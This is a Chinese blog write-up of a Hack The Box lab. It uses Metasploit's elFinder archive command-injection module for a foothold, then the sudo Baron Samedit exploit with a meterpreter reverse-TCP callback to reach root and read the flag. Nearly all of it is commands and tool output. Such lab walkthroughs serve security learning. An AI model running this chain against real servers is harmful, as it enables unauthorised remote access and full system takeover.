每日一练
题目
解答
题目一
┌──(kali㉿HgTrojan)-[~]
└─$ curl 10.129.203.52
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<title>elFinder 2.1.x source version with PHP connector</title>
<!-- Require JS (REQUIRED) -->
<!-- Rename "main.default.js" to "main.js" and edit it if you need configure elFInder 2.1.53 options or any things -->
<script data-main="./main.default.js" src="//cdnjs.cloudflare.com/ajax/libs/require.js/2.3.6/require.min.js"></script>
<script>
define('elFinderConfig', {
// elFinder options (REQUIRED)
// Documentation for client options:
// https://github.com/Studio-42/elFinder/wiki/Client-configuration-options
defaultOpts : {
url : 'php/connector.minimal.php', // or connector.maximal.php : connector URL (REQUIRED)
commandsOptions : {
edit : {
extraOptions : {
// set API key to enable Creative Cloud image editor
// see https://console.adobe.io/
creativeCloudApiKey : '',
// browsing manager URL for CKEditor, TinyMCE
// uses self location with the empty value
managerUrl : ''
}
},
quicklook : {
// to enable CAD-Files and 3D-Models preview with sharecad.org
sharecadMimes : ['image/vnd.dwg', 'image/vnd.dxf', 'model/vnd.dwf', 'application/vnd.hp-hpgl', 'application/plt', 'application/step', 'model/iges', 'application/vnd.ms-pki.stl', 'application/sat', 'image/cgm', 'application/x-msmetafile'],
// to enable preview with Google Docs Viewer
googleDocsMimes : ['application/pdf', 'image/tiff', 'application/vnd.ms-office', 'application/msword', 'application/vnd.ms-word', 'application/vnd.ms-excel', 'application/vnd.ms-powerpoint', 'application/vnd.openxmlformats-officedocument.wordprocessingml.document', 'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet', 'application/vnd.openxmlformats-officedocument.presentationml.presentation', 'application/postscript', 'application/rtf'],
// to enable preview with Microsoft Office Online Viewer
// these MIME types override "googleDocsMimes"
officeOnlineMimes : ['application/vnd.ms-office', 'application/msword', 'application/vnd.ms-word', 'application/vnd.ms-excel', 'application/vnd.ms-powerpoint', 'application/vnd.openxmlformats-officedocument.wordprocessingml.document', 'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet', 'application/vnd.openxmlformats-officedocument.presentationml.presentation', 'application/vnd.oasis.opendocument.text', 'application/vnd.oasis.opendocument.spreadsheet', 'application/vnd.oasis.opendocument.presentation']
}
},
// bootCalback calls at before elFinder boot up
bootCallback : function(fm, extraObj) {
/* any bind functions etc. */
fm.bind('init', function() {
// any your code
});
// for example set document.title dynamically.
var title = document.title;
fm.bind('open', function() {
var path = '',
cwd = fm.cwd();
if (cwd) {
path = fm.path(cwd.hash) || null;
}
document.title = path? path + ':' + title : title;
}).bind('destroy', function() {
document.title = title;
});
}
},
managers : {
// 'DOM Element ID': { /* elFinder options of this DOM Element */ }
'elfinder': {}
}
});
</script>
</head>
<body>
<!-- Element where elFinder will be created (REQUIRED) -->
<div id="elfinder"></div>
</body>
</html>
题目二
已知框架为elFinder 2.1.x,msf启动
┌──(root㉿HgTrojan)-[/home/kali]
└─# msfconsole
Metasploit tip: View missing module options with show missing
Unable to handle kernel NULL pointer dereference at virtual address 0xd34db33f
EFLAGS: 00010046
eax: 00000001 ebx: f77c8c00 ecx: 00000000 edx: f77f0001
esi: 803bf014 edi: 8023c755 ebp: 80237f84 esp: 80237f60
ds: 0018 es: 0018 ss: 0018
Process Swapper (Pid: 0, process nr: 0, stackpage=80377000)
Stack: 90909090990909090990909090
90909090990909090990909090
90909090.90909090.90909090
90909090.90909090.90909090
90909090.90909090.09090900
90909090.90909090.09090900
..........................
cccccccccccccccccccccccccc
cccccccccccccccccccccccccc
ccccccccc.................
cccccccccccccccccccccccccc
cccccccccccccccccccccccccc
.................ccccccccc
cccccccccccccccccccccccccc
cccccccccccccccccccccccccc
..........................
ffffffffffffffffffffffffff
ffffffff..................
ffffffffffffffffffffffffff
ffffffff..................
ffffffff..................
ffffffff..................
Code: 00 00 00 00 M3 T4 SP L0 1T FR 4M 3W OR K! V3 R5 I0 N5 00 00 00 00
Aiee, Killing Interrupt handler
Kernel panic: Attempted to kill the idle task!
In swapper task - not syncing
=[ metasploit v6.3.51-dev ]
+ -- --=[ 2384 exploits - 1235 auxiliary - 418 post ]
+ -- --=[ 1391 payloads - 46 encoders - 11 nops ]
+ -- --=[ 9 evasion ]
Metasploit Documentation: https://docs.metasploit.com/
msf6 > search elFinder
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/multi/http/builderengine_upload_exec 2016-09-18 excellent Yes BuilderEngine Arbitrary File Upload Vulnerability and execution
1 exploit/unix/webapp/tikiwiki_upload_exec 2016-07-11 excellent Yes Tiki Wiki Unauthenticated File Upload Vulnerability
2 exploit/multi/http/wp_file_manager_rce 2020-09-09 normal Yes WordPress File Manager Unauthenticated Remote Code Execution
3 exploit/linux/http/elfinder_archive_cmd_injection 2021-06-13 excellent Yes elFinder Archive Command Injection
4 exploit/unix/webapp/elfinder_php_connector_exiftran_cmd_injection 2019-02-26 excellent Yes elFinder PHP Connector exiftran Command Injection
Interact with a module by name or index. For example info 4, use 4 or use exploit/unix/webapp/elfinder_php_connector_exiftran_cmd_injection
msf6 > use 3
填写完信息run,我们就获取了www-data权限。
题目三
根据题目已知sudo存在漏洞,
按 Ctrl + z 获取当前会话,创建新会话
meterpreter >
Background session 1? [y/N]
msf6 exploit(linux/http/elfinder_archive_cmd_injection) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x86/linux www-data @ 10.129.203.52 10.10.16.39:4444 -> 10.129.203.52:54160 (10.129.
203.52)
msf6 exploit(linux/http/elfinder_archive_cmd_injection) > search sudo 1.8.31
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/linux/local/sudo_baron_samedit 2021-01-26 excellent Yes Sudo Heap-Based Buffer Overflow
Interact with a module by name or index. For example info 0, use 0 or use exploit/linux/local/sudo_baron_samedit
msf6 exploit(linux/http/elfinder_archive_cmd_injection) > use 0
[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/local/sudo_baron_samedit) > show options
Module options (exploit/linux/local/sudo_baron_samedit):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on
WritableDir /tmp yes A directory where you can write files.
Payload options (linux/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.5.10.131 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
View the full module info with the info, or info -d command.
msf6 exploit(linux/local/sudo_baron_samedit) > set session 1
session => 1
msf6 exploit(linux/local/sudo_baron_samedit) > set l
set lengths set lhost set loglevel set lport
msf6 exploit(linux/local/sudo_baron_samedit) > set lhost 10.10.16.39
lhost => 10.10.16.39
msf6 exploit(linux/local/sudo_baron_samedit) > run
[*] Started reverse TCP handler on 10.10.16.39:4444
[!] SESSION may not be compatible with this module:
[!] * incompatible session architecture: x86
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated. sudo 1.8.31 may be a vulnerable build.
[*] Using automatically selected target: Ubuntu 20.04 x64 (sudo v1.8.31, libc v2.31)
[*] Writing '/tmp/EaLIXMf51.py' (763 bytes) ...
[*] Writing '/tmp/libnss_Ubl/QLO .so.2' (548 bytes) ...
[*] Sending stage (3045380 bytes) to 10.129.203.52
[+] Deleted /tmp/EaLIXMf51.py
[+] Deleted /tmp/libnss_Ubl/QLO .so.2
[*]
[*] Alternative exploit target(s) exist for this OS version:
[*] 2: Ubuntu 20.04 x64 (sudo v1.8.31, libc v2.31) - alternative
[*] Run `set target <id>` to select an alternative exploit script
[+] Deleted /tmp/libnss_Ubl
[*] Meterpreter session 2 opened (10.10.16.39:4444 -> 10.129.203.52:54646) at 2024-01-19 02:46:28 -0500
meterpreter > shell
Process 20457 created.
Channel 1 created.
^C
Terminate channel 1? [y/N] y
meterpreter > cd /root
meterpreter > ls
Listing: /root
==============
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100600/rw------- 178 fil 2022-05-16 11:35:30 -0400 .bash_history
100644/rw-r--r-- 3106 fil 2022-05-16 11:34:51 -0400 .bashrc
040700/rwx------ 4096 dir 2022-05-16 09:46:07 -0400 .cache
040700/rwx------ 4096 dir 2022-05-16 09:46:06 -0400 .config
040755/rwxr-xr-x 4096 dir 2022-05-16 09:46:07 -0400 .local
100644/rw-r--r-- 161 fil 2019-12-05 09:39:21 -0500 .profile
100644/rw-r--r-- 75 fil 2022-05-16 04:45:33 -0400 .selected_editor
040700/rwx------ 4096 dir 2021-10-06 13:37:09 -0400 .ssh
100600/rw------- 13300 fil 2022-05-16 11:34:51 -0400 .viminfo
100644/rw-r--r-- 291 fil 2022-05-16 09:51:29 -0400 .wget-hsts
100644/rw-r--r-- 24 fil 2022-05-16 11:18:40 -0400 flag.txt
040755/rwxr-xr-x 4096 dir 2021-10-06 13:37:19 -0400 snap
meterpreter > cat flag.txt
HTB{5e55ion5_4r3_sw33t}
meterpreter >
至于此提权root,flag获取成功 。
打赏: 支付宝
本人所有文章均为技术分享,均用于防御为目的的记录,所有操作均在实验环境下进行,请勿用于其他用途,否则后果自负。 本博客所有文章除特别声明外,均采用 BY-NC-SA 许可协议。转载请注明出处!
You actually make it seem so easy with your presentation but I find
this topic to be really something which I think I would never understand.
It seems too complicated and extremely broad for me. I'm looking forward for
your next post, I will try to get the hang of it!
Thank you for your love. I hope we can make progress together.